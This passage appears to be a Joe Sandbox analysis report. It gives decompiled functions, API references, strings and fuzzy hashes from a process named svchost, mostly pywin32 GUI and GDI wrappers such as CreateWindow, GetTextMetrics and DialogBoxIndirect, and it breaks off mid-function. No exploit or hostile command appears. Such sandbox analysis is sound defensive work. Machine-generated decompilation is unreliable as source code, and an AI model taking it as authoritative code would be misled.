                            • Opcode Fuzzy Hash: c484b7fa667f8a2eeae4308530e4419f6ce8845a633c1366325e0087f3044667
                            • Instruction Fuzzy Hash: 9BD0A773B4025033F66062A53C0BF5F75A49BD2F52F050479F708DB1D1E990980943A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BDBA5E(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
                            				void* _t10;
                            
                            				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
                            				return _t10;
                            			}





                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,00BDBDC8,?,?,00000000,?,00BDBDC8,00000000,0000000C), ref: 00BDBA7B
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 0f0379c88d42d7e089d2f871db34dca2536e7dac28ce646b8e42097dde967d91
                            • Instruction ID: e6c2dc39c6a3e5e5a840c712e2216bd12e6a74069c8087d7a4322ccfe7085d00
                            • Opcode Fuzzy Hash: 0f0379c88d42d7e089d2f871db34dca2536e7dac28ce646b8e42097dde967d91
                            • Instruction Fuzzy Hash: 1DD06C3201014DBBDF029F84ED46EDA3BAAFB48714F014100BA1856020C776E861AB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOk:RegisterDeviceNotification,?,?,?), ref: 6DAAD58B
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAD5A7
                            • PyObject_AsReadBuffer.PYTHON38(?,?,?), ref: 6DAAD5C2
                            • PyErr_Format.PYTHON38(6E28ED94,buffer isn't a DEV_BROADCAST_* structure: structure says it has %d bytes, but %d was provided,?,?), ref: 6DAAD5EB
                            Strings
                            • OOk:RegisterDeviceNotification, xrefs: 6DAAD582
                            • RegisterDeviceNotification, xrefs: 6DAAD625
                            • buffer isn't a DEV_BROADCAST_* structure: structure says it has %d bytes, but %d was provided, xrefs: 6DAAD5E4
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$Arg_BufferErr_FormatParseReadTupleU_object@@
                            • String ID: OOk:RegisterDeviceNotification$RegisterDeviceNotification$buffer isn't a DEV_BROADCAST_* structure: structure says it has %d bytes, but %d was provided
                            • API String ID: 3170462299-3901231234
                            • Opcode ID: b75a36fe429582cc0c23098137e5a813040f391bbdfdf4815032c67820a75630
                            • Instruction ID: cc5d58f6a22bb4bb175d8cbb1309bdd2114fd4a45ac908102979de16a09a0cbc
                            • Opcode Fuzzy Hash: b75a36fe429582cc0c23098137e5a813040f391bbdfdf4815032c67820a75630
                            • Instruction Fuzzy Hash: 6521A77A508201AFDB00AB18CC45DBB37B9FF85215F888669F955C2131F731D96ACB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:IsIconic), ref: 6DAB7897
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB78B3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB78C2
                            • IsIconic.USER32(?), ref: 6DAB78CE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB78D7
                            • Py_BuildValue.PYTHON38(6DABDEC0,00000000), ref: 6DAB78E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildIconicObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: O:IsIconic
                            • API String ID: 3185283865-1799084589
                            • Opcode ID: 41744823ddec55552b9fac61ca544ee1fe58bcf9bb8af78b88c95a515e462929
                            • Instruction ID: 1f92cc468eda087304d0c3694eec6566d1a97b0d1931a80b26b2e755dd513b35
                            • Opcode Fuzzy Hash: 41744823ddec55552b9fac61ca544ee1fe58bcf9bb8af78b88c95a515e462929
                            • Instruction Fuzzy Hash: 9FF06235808201AFDF006B65DC49A6A7BB9EF81216F044534FC85C1121E735896BCAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyModule_Create2.PYTHON38(6DA96180,000003F5), ref: 6DA92555
                            • PyModule_GetDict.PYTHON38(00000000), ref: 6DA92568
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Module_$Create2Dict
                            • String ID: EVENT_ALL_ACCESS$EVENT_MODIFY_STATE$INFINITE$MAXIMUM_WAIT_OBJECTS$QS_ALLEVENTS$QS_ALLINPUT$QS_HOTKEY$QS_INPUT$QS_KEY$QS_MOUSE$QS_MOUSEBUTTON$QS_MOUSEMOVE$QS_PAINT$QS_POSTMESSAGE$QS_SENDMESSAGE$QS_TIMER$SYNCHRONIZE$UNICODE$WAIT_ABANDONED$WAIT_ABANDONED_0$WAIT_FAILED$WAIT_IO_COMPLETION$WAIT_OBJECT_0$WAIT_TIMEOUT$error$L)n
                            • API String ID: 1218557240-1497788517
                            • Opcode ID: 0b9b671614a9bd6b5f8de389135b69db9799f3de2bd847308cb290dc096a458e
                            • Instruction ID: 309248268fef4e18fed6dd13eb24c4da5c053b8a785c42bf24d25cca5117358f
                            • Opcode Fuzzy Hash: 0b9b671614a9bd6b5f8de389135b69db9799f3de2bd847308cb290dc096a458e
                            • Instruction Fuzzy Hash: 104110E0A5835C3DE52033B65C49F3F2D8CEF88668F055512FA2D9D1C3DDE4944089BA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTupleAndKeywords.PYTHON38(?,?,k|Ok,6DAC7AB8,?,?,?), ref: 6DAAC1EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_KeywordsParseTuple
                            • String ID: Action %d is not supported yet$Param must be a sequence of 3 ints$SystemParametersInfo$Unable to allocate %d bytes$iArrange$iBorderWidth$iCaptionHeight$iCaptionWidth$iHorzGap$iMenuHeight$iMenuWidth$iScrollHeight$iScrollWidth$iSmCaptionHeight$iSmCaptionWidth$iVertGap$iWidth$kkk$kkk$k|Ok$lfCaptionFont$lfMenuFont$lfMessageFont$lfSmCaptionFont$lfStatusFont${s:i,s:i,s:i,s:i,s:i,s:N,s:i,s:i,s:N,s:i,s:i,s:N,s:N,s:N}${s:i,s:i,s:i,s:i}
                            • API String ID: 3508857537-88640142
                            • Opcode ID: 3752294b2084181cbbe8dc09e90f228eba3d190ddf75ea933b901d9a2f73c826
                            • Instruction ID: 26558f35eca6cbf0043c58f0c958d7f5c2ac968a83ddae7317bb8f118e52d3f8
                            • Opcode Fuzzy Hash: 3752294b2084181cbbe8dc09e90f228eba3d190ddf75ea933b901d9a2f73c826
                            • Instruction Fuzzy Hash: F2D1C47940C302AFEB019F64CC40A2A7BF5BF45354F0C8A69F596C7262E731DA96CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetTextMetrics), ref: 6DAA9090
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA90AC
                            • GetTextMetricsW.GDI32(?,?), ref: 6DAA90C2
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetTextMetrics,00000000), ref: 6DAA90D2
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@MetricsObject_ParseTextTupleWin_
                            • String ID: Ascent$AveCharWidth$BreakChar$CharSet$DefaultChar$Descent$DigitizedAspectX$DigitizedAspectY$ExternalLeading$FirstChar$GetTextMetrics$Height$InternalLeading$Italic$LastChar$MaxCharWidth$O:GetTextMetrics$Overhang$PitchAndFamily$StruckOut$Underlined$Weight${s:l,s:l,s:l,s:l,s:l,s:l,s:l,s:l,s:l,s:l,s:l,s:N,s:N,s:N,s:N,s:B,s:B,s:B,s:B,s:B}
                            • API String ID: 431775070-2596769364
                            • Opcode ID: fd6337c79de06f0b6c6435fcd4149b98b539c57c30255f0334024427e8944ff2
                            • Instruction ID: 26adc5d951c0b8292f58756b298cb34ff159fcb7187465578c9b93fd4b0b8e27
                            • Opcode Fuzzy Hash: fd6337c79de06f0b6c6435fcd4149b98b539c57c30255f0334024427e8944ff2
                            • Instruction Fuzzy Hash: 653162B144C344BEDA315FA48C40FBF7AE9BF88211F445818FAD8D1122E776C5A49B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOOiiiiOOOO:CreateWindowEx,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB726B
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAB7289
                            • PyErr_Occurred.PYTHON38 ref: 6DAB729B
                            • ?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z.PYWINTYPES38(?,?,00000001), ref: 6DAB72B0
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAB72CE
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAB72DF
                            • PyErr_Occurred.PYTHON38 ref: 6DAB72EB
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7300
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7312
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7324
                            • PyErr_SetString.PYTHON38(6E28ED8C,This param must be None), ref: 6DAB7345
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Err_$LongLong_MaskOccurredUnsigned$Arg_ParseResourceStringTuple
                            • String ID: CreateWindowEx$OOOOiiiiOOOO:CreateWindowEx$This param must be None
                            • API String ID: 1939099319-640032765
                            • Opcode ID: 3e0f887f17b8c5bfaa2d52df78d7b2283d57f6182a5f22308eec5f0f3743a5d2
                            • Instruction ID: 21db5f86720bce7d1a30609f0db1fb421a7f2c282f9915c1beb8f2104c19658d
                            • Opcode Fuzzy Hash: 3e0f887f17b8c5bfaa2d52df78d7b2283d57f6182a5f22308eec5f0f3743a5d2
                            • Instruction Fuzzy Hash: 9361DE7180C305AFDB019F50CC84B9BBBF8FF84310F544A29F94592260E775D95ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOiiiiOOOO:CreateWindow,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAAFD6B
                            • ?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z.PYWINTYPES38(?,00000001,00000001), ref: 6DAAFD89
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAAFDA3
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAAFDB5
                            • PyErr_Occurred.PYTHON38 ref: 6DAAFDC5
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_Err_LongLong_MaskOccurredParseResourceTupleUnsigned
                            • String ID: CreateWindow$OOOiiiiOOOO:CreateWindow$This param must be None
                            • API String ID: 1517206388-4014081329
                            • Opcode ID: 6a64ce8d53431c5d5c603a6ad2c2184da3d6c1e8ef2af6da5f80398625d68b37
                            • Instruction ID: 1ec64070e34e5c1ed1e4777995073f4635bd67e322cb3a7655ed2423c43c2a6e
                            • Opcode Fuzzy Hash: 6a64ce8d53431c5d5c603a6ad2c2184da3d6c1e8ef2af6da5f80398625d68b37
                            • Instruction Fuzzy Hash: 96618A7240C301AFDB019F54CC84BAB7BF8FF85315F484A2DF99592260E731D95A8B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi|i,?,?), ref: 6DAA8D81
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAA8DA1
                            • ExtractIconExW.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 6DAA8DC1
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAA8DCF
                            • PyLong_FromLong.PYTHON38(?), ref: 6DAA8DD9
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$Arg_ExtractFreeFromIconLongLong_ParseTupleU_object@@
                            • String ID: ExtractIconEx$Must supply a valid number of icons to fetch.$Oi|i
                            • API String ID: 2680033120-1399554263
                            • Opcode ID: 7bcf88cf5127dd764d82cef0f16205e145a0cc93b6e4d4e96e25a436258ae7c7
                            • Instruction ID: 35829dda170d957496f30df629b804726df979e0aecd15b6cc849ed4cda22fc5
                            • Opcode Fuzzy Hash: 7bcf88cf5127dd764d82cef0f16205e145a0cc93b6e4d4e96e25a436258ae7c7
                            • Instruction Fuzzy Hash: 3451BF7450D3429FCB009F24CC84B6A7BB1FF85311F088728F9A992261E7329966DB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E6DAA69F0(intOrPtr _a8) {
                            				void _v96;
                            				char _v108;
                            				void _v120;
                            				char _v124;
                            				void* _v128;
                            				void* _v132;
                            				intOrPtr _v136;
                            				char* _t17;
                            				void** _t19;
                            				long _t20;
                            				void* _t21;
                            				int _t23;
                            				void* _t24;
                            				int _t26;
                            				intOrPtr _t27;
                            				int _t31;
                            				intOrPtr _t32;
                            				long _t35;
                            				void** _t41;
                            
                            				_t17 =  &_v124;
                            				__imp__PyArg_ParseTuple(_a8, "O", _t17);
                            				_t41 =  &(( &_v128)[3]);
                            				if(_t17 == 0) {
                            					L8:
                            					return 0;
                            				} else {
                            					_t19 = _t41;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v124, _t19);
                            					if(_t19 == 0) {
                            						goto L8;
                            					} else {
                            						_t20 = GetObjectType(_v128);
                            						_t35 = _t20;
                            						if(_t35 != 0) {
                            							_t21 = _t20 - 1;
                            							if(_t21 == 0) {
                            								_t23 = GetObjectW(_v132, 0x10,  &_v120);
                            								if(_t23 != 0) {
                            									__imp__Py_BuildValue("{s:I, s:l, s:k}", "Style", _v132, "Width", _v128, "Color", _v120);
                            									return _t23;
                            								} else {
                            									__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetObject", _t23);
                            									return _t23;
                            								}
                            							} else {
                            								_t24 = _t21 - 5;
                            								if(_t24 == 0) {
                            									_t26 = GetObjectW(_v132, 0x5c,  &_v96);
                            									if(_t26 != 0) {
                            										_t27 = E6DAB974E(0x64);
                            										_v136 = _t27;
                            										if(_t27 == 0) {
                            											goto L8;
                            										} else {
                            											return E6DAA6510(_t27,  &_v108);
                            										}
                            									} else {
                            										__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetObject", _t26);
                            										return _t26;
                            									}
                            								} else {
                            									if(_t24 == 1) {
                            										_t31 = GetObjectW(_v132, 0x18,  &_v120);
                            										if(_t31 != 0) {
                            											_t32 = E6DAB974E(0x20);
                            											_v136 = _t32;
                            											if(_t32 == 0) {
                            												goto L8;
                            											} else {
                            												return E6DAA6360(_t32,  &_v132);
                            											}
                            										} else {
                            											__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetObject", _t31);
                            											return _t31;
                            										}
                            									} else {
                            										__imp__PyErr_Format( *__imp__PyExc_ValueError, "This GDI object type is not supported: %d", _t35);
                            										goto L8;
                            									}
                            								}
                            							}
                            						} else {
                            							__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetObjectType", _t20);
                            							return _t20;
                            						}
                            					}
                            				}
                            			}























                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,6DABBB6C,?), ref: 6DAA6A07
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,00000000), ref: 6DAA6A1C
                            • GetObjectType.GDI32 ref: 6DAA6A2C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetObjectType,00000000), ref: 6DAA6A3E
                            • PyErr_Format.PYTHON38(6E28ED94,This GDI object type is not supported: %d,00000000), ref: 6DAA6A6E
                            • GetObjectW.GDI32(?,00000018,?), ref: 6DAA6A8B
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetObject,00000000), ref: 6DAA6A9B
                            • new.LIBCMT ref: 6DAA6AAD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Error@@ObjectWin_$Arg_Err_FormatObject_ParseTupleType
                            • String ID: Color$GetObject$GetObject$GetObject$GetObjectType$Style$This GDI object type is not supported: %d$Width${s:I, s:l, s:k}
                            • API String ID: 1957364368-3235274994
                            • Opcode ID: 7ea0bb9f81407e944d96b0a8a737be1a3db9744c8ca26f5aa6e2efa9350d7908
                            • Instruction ID: 08685435dd9b31a39615acb762ed7ecefada85cec0e2044c2747f9244d819b8b
                            • Opcode Fuzzy Hash: 7ea0bb9f81407e944d96b0a8a737be1a3db9744c8ca26f5aa6e2efa9350d7908
                            • Instruction Fuzzy Hash: AB318AB590C302AFDB005F28DC55B767AB8BF45341F4CC624F955C1261FB35C56A8B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetPath,?), ref: 6DAAB0E9
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAB105
                            • GetPath.GDI32(?,00000000,00000000,00000000), ref: 6DAAB124
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetPath,00000000), ref: 6DAAB134
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParsePathTupleWin_
                            • String ID: GetPath$GetPath$O:GetPath$Unable to allocate %d bytes$Unable to allocate %d bytes
                            • API String ID: 879478881-1736508514
                            • Opcode ID: 4017b65557026358c00ff7260bda2f8d780d457be72e78586d4b73811e231257
                            • Instruction ID: 07e3d6078df1f29e87207eb97844838d5e8de298c5ffd96c786a6eab8ff0f5fc
                            • Opcode Fuzzy Hash: 4017b65557026358c00ff7260bda2f8d780d457be72e78586d4b73811e231257
                            • Instruction Fuzzy Hash: 5451C3719083059FDB10DF689C80B6A77F4BF85364F080729FC6593261E735E95A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOii:DrawEdge,00000000,?), ref: 6DAB49D7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB49F0
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB4A2B
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers,DrawEdge), ref: 6DAB4A45
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_ParseTuple$Err_FormatObject_U_object@@
                            • String ID: %s: This param must be a tuple of four integers$%s: This param must be a tuple of four integers$DrawEdge$DrawEdge$DrawEdge$OOii:DrawEdge$llll$llll
                            • API String ID: 1273418297-3484087582
                            • Opcode ID: a13eed2c4d5936b3e156152087ae530b02a175cd921357aa246243191b0840af
                            • Instruction ID: 87a04097cb19525ae796b2d313d6a1fe1e6b8bf518dc0ac06819c81d25b91e37
                            • Opcode Fuzzy Hash: a13eed2c4d5936b3e156152087ae530b02a175cd921357aa246243191b0840af
                            • Instruction Fuzzy Hash: F041D67650C301AFCB019B25CCC4EAB7BFDFF89219F484629F94992121E731D9978B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 19%
                            			E6DAA7920(intOrPtr _a8) {
                            				struct HINSTANCE__* _v4;
                            				struct HWND__* _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char* _t26;
                            				signed int _t28;
                            				signed int _t31;
                            				intOrPtr _t32;
                            				void* _t33;
                            				long _t34;
                            				void* _t37;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				DLGTEMPLATE* _t41;
                            				int _t42;
                            				void* _t47;
                            				void* _t52;
                            				intOrPtr* _t53;
                            				void* _t61;
                            				long _t62;
                            				void* _t64;
                            				void* _t65;
                            				void* _t66;
                            				void* _t67;
                            				void* _t68;
                            				void* _t70;
                            
                            				_t64 =  &_v28;
                            				_v28 = __imp___Py_NoneStruct;
                            				_t26 =  &_v24;
                            				__imp__PyArg_ParseTuple(_a8, "OOOO|O", _t26,  &_v16,  &_v20,  &_v12, _t64);
                            				_t65 = _t64 + 0x1c;
                            				if(_t26 != 0) {
                            					_t53 = __imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z;
                            					_t28 =  *_t53(_v24,  &_v4, _t52);
                            					_t66 = _t65 + 8;
                            					__eflags = _t28;
                            					if(_t28 == 0) {
                            						L4:
                            						__eflags = 0;
                            						return 0;
                            					} else {
                            						_t31 =  *_t53(_v20,  &_v8);
                            						_t67 = _t66 + 8;
                            						__eflags = _t31;
                            						if(_t31 != 0) {
                            							_t32 = _v28;
                            							__eflags = _t32 - __imp___Py_NoneStruct; // 0x6e294ce8
                            							if(__eflags == 0) {
                            								L8:
                            								_t33 = E6DAA5280(_t32, _v16);
                            								_t47 = _t33;
                            								_t68 = _t67 + 4;
                            								__eflags = _t47;
                            								if(_t47 != 0) {
                            									_t34 = GlobalLock(_t47);
                            									_t41 = _t34;
                            									__eflags = _t41;
                            									if(_t41 != 0) {
                            										__imp__Py_BuildValue("OO", _v12, _v28, _t61);
                            										_t62 = _t34;
                            										__imp__PyEval_SaveThread();
                            										_t42 = DialogBoxIndirectParamW(_v4, _t41, _v8, E6DAA5B50, _t62);
                            										GlobalUnlock(_t47);
                            										_t37 = GlobalFree(_t47);
                            										__imp__PyEval_RestoreThread(_t34);
                            										_t70 = _t68 + 0x10;
                            										 *_t62 =  *_t62 + 0xffffffff;
                            										__eflags =  *_t62;
                            										if( *_t62 == 0) {
                            											__imp___Py_Dealloc(_t62);
                            											_t70 = _t70 + 4;
                            										}
                            										__eflags = _t42 - 0xffffffff;
                            										if(_t42 != 0xffffffff) {
                            											__imp__?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z(_t42);
                            											return _t37;
                            										} else {
                            											__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("DialogBoxIndirect", 0);
                            											return _t37;
                            										}
                            									} else {
                            										_t38 = GlobalFree(_t47);
